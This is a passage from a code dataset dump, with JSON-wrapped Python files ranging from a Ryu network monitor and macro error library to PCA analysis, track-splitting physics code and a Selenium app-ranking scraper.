N分目までの全ハト数 > 0の場合。\n if number - pegeonAllNum > 0:\n pegeonCount += number - pegeonAllNum\n\n return pegeonCount\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(1) == 1, \"1st example\"\n assert checkio(2) == 1, \"2nd example\"\n assert checkio(5) == 3, \"3rd example\"\n assert checkio(10) == 6, \"4th example\"","sub_path":"150626_checkio/checkio_home_FeedPigeons.py","file_name":"checkio_home_FeedPigeons.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112767272","text":"from __future__ import division\nfrom operator import attrgetter\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import CONFIG_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.lib import hub\nfrom ryu.lib.packet import packet\nimport os.path\n\nOFP_SWITCHES_FLOW_STATS = \\\n './network-data2/ofp_switches_{0}_flow_stats.db'\nOFP_SWITCHES_FLOW_STATS_PREVIOUS = \\\n './network-data2/ofp_switches_{0}_flow_stats_prev.db'\nOFP_SWITCHES_PORT_STATS = \\\n './network-data2/ofp_switches_{0}_port_stats.db'\nOFP_SWITCHES_PORT_STATS_PREVIOUS = \\\n './network-data2/ofp_switches_{0}_port_stats_prev.db'\n\n\nclass MySimpleMonitor(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(MySimpleMonitor, self).__init__(*args, **kwargs)\n self.datapaths = {}\n self.monitor_thread = hub.spawn(self._monitor)\n self.port_stats = {}\n self.port_speed = {}\n self.flow_stats = {}\n self.flow_speed = {}\n self.sleep = 10\n self.state_len = 3\n\n @set_ev_cls(ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n if ev.state == MAIN_DISPATCHER:\n if not datapath.id in self.datapaths:\n self.logger.debug('register datapath: %016x', datapath.id)\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.debug('unregister datapath: %016x', datapath.id)\n del self.datapaths[datapath.id]\n\n # get the ports' features.\n @set_ev_cls(\n ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def port_features_handler(self, ev):\n datapath = ev.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n def _monitor(self):\n while True:\n for dp in self.datapaths.values():\n self._request_stats(dp)\n hub.sleep(self.sleep)\n\n def _request_stats(self, datapath):\n self.logger.debug('send stats request: %016x', datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n def _save_stats(self, dist, key, value, length):\n if key not in dist:\n dist[key] = []\n dist[key].append(value)\n\n if len(dist[key]) > length:\n dist[key].pop(0)\n\n def _get_speed(self, now, pre, period):\n if period == 0:\n return\n return (now - pre) / period\n\n def _get_time(self, sec, nsec):\n return sec + nsec / (10**9)\n\n def _get_period(self, n_sec, n_nsec, p_sec, p_nsec):\n return self._get_time(n_sec, n_nsec) - self._get_time(p_sec, p_nsec)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n def _flow_stats_reply_handler(self, ev):\n # print \"simple_monitor.flow_stats:\"\n body = ev.msg.body\n switch_name = ev.msg.datapath.id\n with open(OFP_SWITCHES_FLOW_STATS.format(switch_name), 'w') as iff:\n # print \"writing to %s\" % (os.path.abspath(OFP_SWITCHES_FLOW_STATS.format(switch_name)))\n self.logger.debug(\"\\n> Flow Stats:\")\n self.logger.debug('datapath '\n 'hostname '\n 'in-port duration_sec duration_nsec '\n ' eth-dst out-port packets bytes')\n iff.write('datapath '\n 'hostname '\n 'in-port duration_sec duration_nsec '\n ' eth-dst out-port packets bytes\\n')\n self.logger.debug('---------------- '\n '---------------- '\n '-------- ---------------- -------------- '\n '---------------- -------- -------- --------')\n iff.write('---------------- '\n '---------------- '\n '-------- ---------------- -------------- '\n '---------------- -------- -------- --------\\n')\n for stat in sorted([flow for flow in body if flow.priority == 3],\n key=lambda flow: (flow.match['in_port'],\n flow.match['eth_dst'])):\n\n key = (\n stat.match['in_port'], stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,)\n value = (\n stat.packet_count, stat.byte_count,\n stat.duration_sec, stat.duration_nsec)\n self._save_stats(self.flow_stats, key, value, self.state_len)\n\n # Get flow's speed.\n pre = 0\n period = self.sleep\n tmp = self.flow_stats[key]\n if len(tmp) > 1:\n pre = tmp[-2][1]\n period = self._get_period(\n tmp[-1][2], tmp[-1][3],\n tmp[-2][2], tmp[-2][3])\n\n speed = self._get_speed(\n self.flow_stats[key][-1][1], pre, period)\n\n self._save_stats(self.flow_speed, key, speed, self.state_len)\n\n iff.write('%16d %16s %8x %16d %16d %17s %8x %8d %8d' %\n (ev.msg.datapath.id,\n str(ev.msg.datapath.id),\n stat.match['in_port'], stat.duration_sec,\n stat.duration_nsec, stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count))\n iff.write(\"\\n\")\n self.logger.debug('%16d %16s %8x %16d %16d %17s %8x %8d %8d',\n ev.msg.datapath.id,\n str(ev.msg.datapath.id),\n stat.match['in_port'], stat.duration_sec,\n stat.duration_nsec, stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count)\n # print \"\\n%16d (%s %s %s ) [(%s %s %s %s)]\" % (ev.msg.datapath.id,\n # 'in_port', 'eth_dst', 'actions.port', 'packet_count', 'byte_count',\n # 'duration_sec', 'duration_nsec')\n # for key, val in self.flow_stats.items():\n # print key, \" \", val\n # print \"Flow speed\"\n # for key, val in self.flow_speed.items():\n # print key, val\n\n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)\n def _port_stats_reply_handler(self, ev):\n # print \"simple_monitor.port_stats:\"\n body = ev.msg.body\n switch_name = ev.msg.datapath.id\n with open(OFP_SWITCHES_PORT_STATS.format(switch_name), 'w') as iff:\n # print \"writing to %s\" % (os.path.abspath(OFP_SWITCHES_PORT_STATS.format(switch_name)))\n self.logger.debug(\"\\n> Port Stats:\")\n self.logger.debug('datapath '\n 'hostname '\n 'port duration_sec duration_nsec '\n 'rx-pkts rx-bytes rx-error '\n 'tx-pkts tx-bytes tx-error')\n iff.write('datapath '\n 'hostname '\n 'port duration_sec duration_nsec '\n 'rx-pkts rx-bytes rx-error '\n 'tx-pkts tx-bytes tx-error\\n')\n self.logger.debug('---------------- '\n '-------------- '\n '-------- ---------------- -------------- '\n '-------- -------- -------- '\n '-------- -------- --------')\n iff.write('---------------- '\n '-------------- '\n '-------- ------------ -------------- '\n '-------- -------- -------- '\n '-------- -------- --------\\n')\n for stat in sorted(body, key=attrgetter('port_no')):\n key = (ev.msg.datapath.id, stat.port_no)\n value = (\n stat.rx_packets, stat.rx_bytes, stat.rx_errors,\n stat.duration_sec, stat.duration_nsec)\n\n self._save_stats(self.port_stats, key, value, self.state_len)\n\n # Get port speed.\n pre = 0\n period = self.sleep\n tmp = self.port_stats[key]\n if len(tmp) > 1:\n pre = tmp[-2][1]\n period = self._get_period(\n tmp[-1][3], tmp[-1][4],\n tmp[-2][3], tmp[-2][4])\n\n speed = self._get_speed(\n self.port_stats[key][-1][1], pre, period)\n\n self._save_stats(self.port_speed, key, speed, self.state_len)\n # print '\\n Speed: %s bytes\\/s\\n' % (self.port_speed)\n\n self.logger.debug('%016x %8s %8x %16d %16d %8d %8d %8d %8d %8d %8d',\n ev.msg.datapath.id,\n ev.msg.datapath.id,\n stat.port_no, stat.duration_sec, stat.duration_nsec,\n stat.rx_packets, stat.rx_bytes,\n stat.rx_errors, stat.tx_packets,\n stat.tx_bytes, stat.tx_errors)\n iff.write('%016x %8s %8x %16d %16d %8d %8d %8d %8d %8d %8d' %\n (ev.msg.datapath.id,\n ev.msg.datapath.id,\n stat.port_no, stat.duration_sec, stat.duration_nsec,\n stat.rx_packets, stat.rx_bytes, stat.rx_errors,\n stat.tx_packets, stat.tx_bytes, stat.tx_errors))\n iff.write(\"\\n\")\n\n # print \"\\n(%16d %s) [(%s %s %s %s %s)]\" % (ev.msg.datapath.id,\n # 'stat_port_no', 'rx_packets',\n # 'rx_bytes', 'rx_errors', 'duration_sec', 'duration_nsec')\n # for key, val in self.port_stats.items():\n # print key, \" \", val\n # print \"port speed\"\n # for key, val in self.port_speed.items():\n # print key, val\n","sub_path":"ryu/app/my_monitor_v1_topo_2.py","file_name":"my_monitor_v1_topo_2.py","file_ext":"py","file_size_in_byte":11031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"400780238","text":"\"\"\"Module handling the library of all existing errors\n\"\"\"\n\nfrom .error import Error\nfrom .log import Log\n\nclass ErrorLibException(Exception):\n \"\"\"Exception for internat errors of the library\n \"\"\"\n def __init__(self, message: str):\n \"\"\"\n Args:\n message (str): the internal error message\n \"\"\"\n self.message = message\n\nclass ErrorLibrary():\n \"\"\"Class for storing an error library\n\n Attributes:\n library [Error]: the list of errors/warnings in the library\n \"\"\"\n def __init__(self):\n self.library = []\n \n def get_error(self, code: str) -> Error:\n \"\"\"Gets the error from the library given an error code\n\n Can throw ErrorLibException\n\n Args:\n code (str): the code of the error\n \"\"\"\n for er in self.library:\n if er.code == code:\n return er\n\n raise ErrorLibException(\"Error code not in library\")\n\n def what_short(self, log: Log) -> str:\n \"\"\"Gets the short description of an error given a Log\n\n Can throw ErrorLibException\n\n Args:\n log (Log): log on basis of which to generate the error message\n \"\"\"\n return self.get_error(log.err_code).what_short(log.line)\n\n def what_long(self, log: Log) -> str:\n \"\"\"Gets the verbose description of an error given a Log\n\n Can throw ErrorLibException\n\n Args:\n log (Log): log on basis of which to generate the error message\n \"\"\"\n return self.get_error(log.err_code).what_long(log.line, log.args)\n\ndef get_error_lib():\n \"\"\"Gets the error library with the defined errors.\n \"\"\"\n lib = ErrorLibrary()\n\n # Errors\n\n # Macro Definition Errors\n # e10 args: 0 - name of incorrect macro\n e = Error(\"e10\", \"Incorrect Macro Name\")\n e.verbose = lambda args: \"Unexpected character encountered in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e11 args: 0 - name of defined macro\n e = Error(\"e11\", \"Macro Already Defined\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" already defined.\"\n lib.library.append(e)\n \n # e12 args: 0 - name of the macro\n # 1 - name of incorrect parameter\n e = Error(\"e12\", \"Incorrect Parameter Name\")\n e.verbose = lambda args: \"Unexpected character encountered in parameter name \\\"\" + args[1] + \"\\\" in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e13 args: 0 - name of macro missing a body\n e = Error(\"e13\", \"Missing Macro Body\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" is missing a body.\"\n lib.library.append(e)\n \n # e14 args: 0 - name of the macro\n # 1 - name of undefined parameter\n e = Error(\"e14\", \"Parameter Undefined\")\n e.verbose = lambda args: \"Parameter \\\"\" + args[1] + \"\\\" is not defined in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e15 args: 0 - name of macro with call\n e = Error(\"e15\", \"Nested Call\")\n e.verbose = lambda args: \"Another macro called inside macro body of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e16 args: 0 - name of macro with definition\n e = Error(\"e16\", \"Nested Definition\")\n e.verbose = lambda args: \"Another macro defined inside macro body of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e17 args: 0 - name of the macro\n # 1 - name of repeated parameter\n e = Error(\"e17\", \"Parameter Repeated\")\n e.verbose = lambda args: \"Parameter \\\"\" + args[1] + \"\\\" is defined more than once in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e18 args: 0 - name of macro with definition\n e = Error(\"e18\", \"Unfinished Definition\")\n e.verbose = lambda args: \"The input ended inside the definition of macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # Macro Call Errors\n # e20 args: 0 - name of undefined macro\n e = Error(\"e20\", \"Undefined Macro\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was not defined.\"\n lib.library.append(e)\n \n # e21 args: 0 - name of macro in question\n # 1 - amount of used parameters\n # 2 - amount of needed parameters\n e = Error(\"e21\", \"Too Few Arguments\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with \" + args[1] + \" parameters, but defined with \" + args[2] + \".\"\n lib.library.append(e)\n \n # e22 args: 0 - name of incorrect macro\n e = Error(\"e22\", \"Incorrect Macro Call\")\n e.verbose = lambda args: \"Unexpected character encountered in macro call \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e23 args: 0 - name of macro with call\n e = Error(\"e23\", \"Nested Call\")\n e.verbose = lambda args: \"Another acro called inside macro call of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # e24 args: 0 - name of macro with definition\n e = Error(\"e24\", \"Nested Definition\")\n e.verbose = lambda args: \"Another macro defined inside macro call of \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n\n # e25 args: 0 - name of macro with definition\n e = Error(\"e25\", \"Unfinished Call\")\n e.verbose = lambda args: \"The input ended inside the call of macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n\n # Other Errors\n # e98 args: 0 - message\n e = Error(\"e98\", \"I/O Error\")\n e.verbose = lambda args: \"There was an error with file I/O: \" + args[0] + \".\"\n lib.library.append(e)\n\n # Warnings\n\n # Macro Definition Warnings\n # w10 args: 0 - name of the macro\n # 1 - name of the parameter\n e = Error(\"w10\", \"Unused Parameter\")\n e.verbose = lambda args: \"Parameter \\\"\" + args[1] + \"\\\" unused in macro \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n \n # w11 args: 0 - name of macro with empty body\n e = Error(\"w11\", \"Empty Macro Body\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" has an empty body.\"\n lib.library.append(e)\n \n # w12 args: 0 - name of unused macro\n e = Error(\"w12\", \"Unused Macro\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was defined, but not called.\"\n lib.library.append(e)\n\n # Macro Call Warnings\n \n # w20 args: 0 - name of the macro\n # 1 - amount of used parameters\n # 2 - amount of needed parameters\n e = Error(\"w20\", \"Too Many Arguments\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with \" + args[1] + \" arguments, but defined with \" + args[2] + \".\"\n lib.library.append(e)\n \n # w21 args: 0 - name of the macro\n # 1 - name of the argument\n e = Error(\"w21\", \"Empty Argument\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with an empty argument \\\"\" + args[1] + \"\\\".\"\n lib.library.append(e)\n\n # w22 args: 0 - name of the macro\n # 1 - name of the argument\n e = Error(\"w22\", \"Whitespace Argument\")\n e.verbose = lambda args: \"Macro \\\"\" + args[0] + \"\\\" was called with an argument \\\"\" + args[1] + \"\\\" starting with whitespace. Possibly unmeant behaviour.\"\n lib.library.append(e)\n\n # CLI Warnings\n # w80 args: 0 - filename\n e = Error(\"w80\", \"Overwrite Warning\")\n e.verbose = lambda args: \"The input file is the same as the output file: \\\"\" + args[0] + \"\\\".\"\n lib.library.append(e)\n\n # Other Warnings\n # w90 args 0 - character\n e = Error(\"w90\", \"Escape Character Error\")\n e.verbose = lambda args: \"Escape Character was used on a non-special character: \\'\" + args[0] + \"\\'.\"\n lib.library.append(e)\n\n return lib\n\nif __name__ == \"__main__\":\n # Printing macro library for debug purposes\n for e in get_error_lib().library:\n print(e.code + \" \" + e.name)\n print(e.what_short(10))\n print(e.what_long(20, [\"arg0\", \"arg1\", \"arg2\"]))","sub_path":"src/error/errorlibrary.py","file_name":"errorlibrary.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584964663","text":"import os, csv, serial\n\nser = serial.Serial('COM3', 9600)\nser.flushInput()\n\n\ncsv_path = os.path.dirname(os.path.abspath(__file__)) + \"\\serial_log.csv\"\nprint(csv_path)\nwith open(csv_path, mode='w', newline='') as file:\n writer = csv.writer(file, dialect=\"excel\")\n while True:\n str = ser.readline().decode('utf-8')\n row = str.split()\n print(row)\n writer.writerow(row)\n","sub_path":"Log_serial_csv.py","file_name":"Log_serial_csv.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"336004760","text":"import numpy as np\n\n\ndef create_hits(X, Y, Z, E):\n\n '''Given the X, Y, Z and E arrays, it creates a\n numpy array with labeled columns: X, Y, Z, E and index.\n The index column is initialized to (0, 0) for each hits\n\n Arguments:\n X, Y, Z, E: np.array\n\n Examples:\n _ _ _ _ _\n\n >>> X = np.array([0, 1, 2])\n >>> Y = np.array([3, 4, 5])\n >>> Z = np.array([6, 7, 8])\n >>> E = np.array([9, 10, 11])\n\n >>> create_hits(X, Y, Z, E)\n array([(0, 3, 6, 9, (0, 0, 0),\n (1, 4, 7, 10, (0, 0, 0),\n (2, 5, 8, 11, (0, 0, 0)),\n dtype=[('X', '>> arr = np.array([1, 2, 10, 11, 12])\n >>> fill_complementary_hits(arr, d=1)\n array([1, 2, 6, 10, 11, 12])\n\n '''\n\n diff = C[1:] - C[:-1]\n sel = diff > d\n\n if ~sel.any():\n return C\n\n idxs = np.argwhere(sel).flatten() + 1\n splited_C = np.split(C, idxs)\n\n for i in range(0, len(splited_C)-1):\n splited_C.append( np.array([ (splited_C[i][-1] + splited_C[i+1][0])/2. ]) )\n\n filled_C = []\n for sp in splited_C:\n filled_C.extend( sp )\n filled_C = np.sort(filled_C)\n\n return filled_C\n\n\ndef index_hits(hits, dx=10, dy=10, dz=2.5):\n\n '''Given a hits array created with create_hits function,\n returns the same hits indexed with its complementary fill.\n\n Arguments:\n hits: np.array\n dx, dy, dz: number (float or int)\n\n Examples:\n _ _ _ _ _\n\n >>> X = np.array([0, 1, 5, 6])\n >>> Y = np.array([0, 0, 0, 0])\n >>> Z = np.array([0, 0, 0, 0])\n >>> E = np.array([0, 0, 0, 0])\n\n >>> hits = create_hits(X, Y, Z, E)\n >>> index_hits(hits, dx=1)\n array([(0., 0., 0., 0., (0, 0, 0)),\n (1., 0., 0., 0., (1, 0, 0)),\n (5., 0., 0., 0., (3, 0, 0)),\n (6., 0., 0., 0., (4, 0, 0))],\n dtype=[('X', '>> X = np.array([0, 1, 5, 6])\n >>> Y = np.array([0, 0, 0, 0])\n >>> Z = np.array([0, 0, 0, 0])\n >>> E = np.array([0, 0, 0, 0])\n\n >>> hits = create_hits(X, Y, Z, E)\n >>> hits = index_hits(hits, dx=1)\n >>> print(hits)\n array([(0., 0., 0., 0., (0, 0, 0)),\n (1., 0., 0., 0., (1, 0, 0)),\n (5., 0., 0., 0., (3, 0, 0)),\n (6., 0., 0., 0., (4, 0, 0))],\n dtype=[('X', '>> track_splitter(hits)\n [array([(0., 0., 0., 0., (0, 0, 0)),\n (1., 0., 0., 0., (1, 0, 0))],\n dtype=[('X', '0:\n H = []\n H.append( hits[0] )\n hits = np.delete(hits, 0, axis=0)\n\n for h in H:\n for n in neig:\n idxs = np.array(list(hits[\"index\"]))\n if len(idxs)==0: break\n\n x = np.isin(idxs[:, 0], h[\"index\"][0] + n[0])\n y = np.isin(idxs[:, 1], h[\"index\"][1] + n[1])\n z = np.isin(idxs[:, 2], h[\"index\"][2] + n[2])\n\n sel = (x & y & z)\n if sel.any():\n i = np.argwhere( sel ).flatten()[0]\n\n H.append(hits[i])\n hits = np.delete(hits, i, axis=0)\n\n H = np.array(H)\n T.append(H)\n\n return T\n","sub_path":"track_id.py","file_name":"track_id.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"321488071","text":"from setuptools import setup, find_packages\nfrom Cython.Build import cythonize\n# run with\n# python setup.py build_ext --inplace\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"l2race\", # Replace with your own username\n version=\"2.0.1\",\n author=\"Marcin Paluch, Antonio Rios, Chang Gao, Tobi Delbruck\",\n author_email=\"tobi@ini.uzh.ch,marcin.paluch1994@gmail.com,arios@us.es\",\n description=\"L2RACE challenge for Telluride Neuromorphic workshop\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/neuromorphs/l2race\",\n packages=find_packages(),\n scripts=['main.py','servery.py'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: CC License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n ext_modules = cythonize([\n \"commonroad/vehicleDynamics_MB.pyx\",\n \"commonroad/vehicleDynamics_ST.pyx\",\n \"commonroad/tireModel.pyx\", \n # \"commonroad/longitudinalParameters.py\",\n \"commonroad/accelerationConstraints.pyx\",\n \"commonroad/steeringConstraints.pyx\",\n # \"commonroad/tireParameters.py\",\n # \"commonroad/vehicleParameters.py\",\n # \"commonroad/steeringParameters.py\",\n \"commonroad/unitConversions/unitConversion.pyx\",\n # \"commonroad/parameters_vehicle1.py\",\n # \"commonroad/parameters_vehicle2.py\",\n # \"commonroad/parameters_vehicle3.py\",\n ], compiler_directives={'language_level' : \"3\"})\n)\n\n# needs to be run on server after touching any of the pyx files with \"python setup.py build_ext --inplace\"\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"218049154","text":"from collections import deque\nimport sys\n\n\n\n\nf = open(\"input\")\nnOfCase = int(f.readline())\n\n\nfor i in xrange(nOfCase):\n N = int(f.readline())\n d = {}\n for j in xrange(2*N-1):\n row = [int(x) for x in f.readline().strip().split()]\n #print row\n for x in row:\n d[x]=d.get(x,0)+1\n lst = []\n for x in d.items():\n #print x\n if x[1] % 2 != 0:\n lst.append(x[0])\n #lst = x[0] if x[1] %2 != 0 for x in d.items\n lst.sort()\n sys.stdout.write(\"Case #%d: \" % (i+1))\n for elem in lst[0:-1]:\n sys.stdout.write(str(elem)+\" \")\n sys.stdout.write(str(lst[-1]))\n sys.stdout.write('\\n')\n","sub_path":"solutions_5630113748090880_1/Python/BigDuck/RankAndFile.py","file_name":"RankAndFile.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419723672","text":"import configparser\nimport logging\n\nimport irccm\n\nlogger = logging.getLogger(__name__)\n\n\nclass INIConfManager(irccm.ConfManager):\n \"\"\"Configuration management interface for INI files.\"\"\"\n def __init__(self, args):\n self.__args = args\n self.__conf = None\n self.__file = None\n self.__sections = None\n\n self.conf.read_file(open(self.file))\n\n @property\n def args(self):\n \"\"\"Command line arguments namespace.\"\"\"\n return self.__args\n\n # TODO: Should the logic here be decoupled from self.args?\n def add(self):\n \"\"\"Add a channel entry to a host section.\"\"\"\n # Get a section object, because it's easier to deal with.\n if self.conf.has_section(self.args.host):\n section = self.conf[self.args.host]\n else:\n # If section does not exist, make it and continue.\n self.conf.add_section(self.args.host)\n section = self.conf[self.args.host]\n\n channels = section.get('channels', None)\n if channels is not None:\n new_chans = self.args.channels\n channels = channels.split(',')\n channels = ','.join(new_chans + channels)\n section['channels'] = self.format_channels(channels)\n else:\n channels = self.format_channels(','.join(self.args.channels))\n section['channels'] = channels\n\n self.conf.write(open(self.file, 'w'))\n return True\n\n @property\n def conf(self):\n \"\"\"The Python object wrapping this configuration file.\"\"\"\n if self.__conf is None:\n self.__conf = configparser.ConfigParser()\n\n return self.__conf\n\n @property\n def file(self):\n \"\"\"The file path of this configuration file.\"\"\"\n if self.__file is None:\n self.__file = self.args.conf_file\n\n return self.__file\n\n def format_channels_per_section(self):\n \"\"\"Format channels in each section.\"\"\"\n for section in self.sections:\n if 'channels' in section:\n self.conf[section.name]['channels'] = \\\n self.format_channels(section['channels'])\n\n def get_sections(self):\n \"\"\"Get the section objects of self.conf.\"\"\"\n sections = []\n for section in self.conf.sections():\n # Indexing returns a Section object.\n sections.append(self.conf[section])\n return sections\n\n # TODO: Should the logic here be decoupled from self.args?\n def remove(self):\n \"\"\"Remove a channel entry from a host section.\"\"\"\n # Get a section object, because it's easier to deal with.\n if self.conf.has_section(self.args.host):\n section = self.conf[self.args.host]\n else:\n # If the section does not exist, finish.\n message = ('The specified host \"%s\" does not exist.'\n % self.args.host)\n logger.debug(message)\n return False\n\n channels = section.get('channels', None)\n if channels is not None: # 'channels' key exists.\n chans_to_rm = self.format_channels(','.join(self.args.channels))\n channels = channels.split(',')\n channels = [chan for chan in channels if chan not in chans_to_rm]\n\n # Channels is either None, [], or a populated list.\n if channels:\n section['channels'] = self.format_channels(','.join(channels))\n else:\n # No more channels left, so remove the key.\n section.pop('channels')\n\n self.conf.write(open(self.file, 'w'))\n return True\n\n @property\n def sections(self):\n \"\"\"The section objects of this conf file.\"\"\"\n if self.__sections is None:\n self.__sections = self.get_sections()\n\n return self.__sections\n","sub_path":"irccm/managers/inicm.py","file_name":"inicm.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"402017047","text":"# -*- coding: utf-8 -*-\nimport numpy as np \nimport pandas as pd \nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing #进行数据标准化处理\nf = open('C:/Users/刘青源/Desktop/主成分分析数据.csv')\ndf_data=pd.read_csv(f,sep=',')\ndata_x=df_data.iloc[:,1:7];\ndata_y=data_x.T\nprint('相关系数矩阵:')\nr=np.corrcoef(data_y)#求相关系数矩阵\nprint(r)\ndata_X=df_data.iloc[:,2:7]\ndata_X=preprocessing.scale(data_X)#标准化矩阵\ndata_yy=data_X.T\nr=np.corrcoef(data_yy)\nr=np.round(r,3)\nv,d=np.linalg.eig(r)# v为特征值,d为特征向量\npca = PCA(n_components=5) \npca.fit(data_X) \nprint('各个成分贡献率:')\nprint(pca.explained_variance_ratio_) \nF=-1*(np.dot(data_X,d[:,0]))#计算主成分得分\nprint('主成分得分为:')\nprint(F)\n#将城市和得分按列合并\ncity=df_data.iloc[:,0]\ncity=city.T\ncity=city.tolist()\nF=F.tolist()\nzoo=np.vstack((city,F))\nzoo=zoo.T\nzoo=zoo[np.lexsort(zoo.T)]\nprint(zoo[::-1,:])\n\n\n","sub_path":"主成分分析.py","file_name":"主成分分析.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"493837920","text":"\"\"\"\nExample of private variables and name mangling\n\"\"\"\n\nclass Mapping:\n def __init__(self, iterable):\n self.items_list = []\n self.__update(iterable)\n def update(self, iterable):\n for item in iterable:\n self.items_list.append(item)\n\n __update = update\n\nclass MappingSubclass(Mapping):\n def update(self, keys, values):\n # provides new signature for update()\n # but doesnt break __init__()\n for item in zip(keys, values):\n self.items_list.append(item)\n\ninstance = Mapping(\"4\")\ninstance.update(\"7\")\nprint(instance.items_list)\ninstance_2 = MappingSubclass(\"4\")\ninstance_2.update(\"4\",\"8\")\nprint(instance_2.items_list)","sub_path":"OOP/private_variables.py","file_name":"private_variables.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"57940289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 22 23:09:46 2020\n\n@author: nouma\n\"\"\"\n\nfrom selenium import webdriver\nimport pandas as pd\nimport time\nfrom selenium.webdriver.firefox.options import Options\n\noptions = Options()\nbrowser = webdriver.Firefox(options= options)\n\nbrowser.get('https://www.appannie.com/apps/google-play/top-chart/?country=US&category=40&device=&date=2020-05-08&feed=Free&rank_sorting_type=rank&page_number=0&page_size=200&table_selections=')\n\ndf = pd.DataFrame(columns=['App', 'Development Company', 'Free Rank', 'Grossing Rank', 'New Free Rank', 'URL', 'Star Rating', 'Ratings', 'Release Date', 'Last update date'])\n\nusername = input('Enter your email address:')\npassword = input('Enter your password:')\nwhile(True):\n try:\n browser.find_element_by_xpath(\"//input[@name='username']\").send_keys(username)\n browser.find_element_by_xpath(\"//input[@type='password']\").send_keys(password)\n browser.find_element_by_xpath(\"//button[@type='submit']\").click()\n break\n except:\n continue\ntime.sleep(10)\nrows = browser.find_elements_by_xpath(\"//tr[@class='main-row table-row']\")\n\nwhile(len(rows) == 0):\n time.sleep(10)\n rows = browser.find_elements_by_xpath(\"//tr[@class='main-row table-row']\")\n time.sleep(1)\nfor row in rows:\n try:\n \n cells = row.find_elements_by_tag_name('td')\n str = row.find_element_by_tag_name('a').get_attribute('href')\n rate = cells[10].text\n \n app = cells[1].text[:-1].split('\\n')[0]\n development = cells[1].text[:-1].split('\\n')[1]\n free_rank = cells[2].text\n grossing_rank = cells[4].text\n new_free_rank = cells[6].text\n url = 'https://play.google.com/store/apps/details?id='+str[46:].replace('/details/','')\n star_rating = cells[9].text\n ratings = rate.replace(',','')\n release_date = cells[11].text\n last_update_date = cells[12].text\n \n ser = pd.Series([app, development, free_rank, grossing_rank, 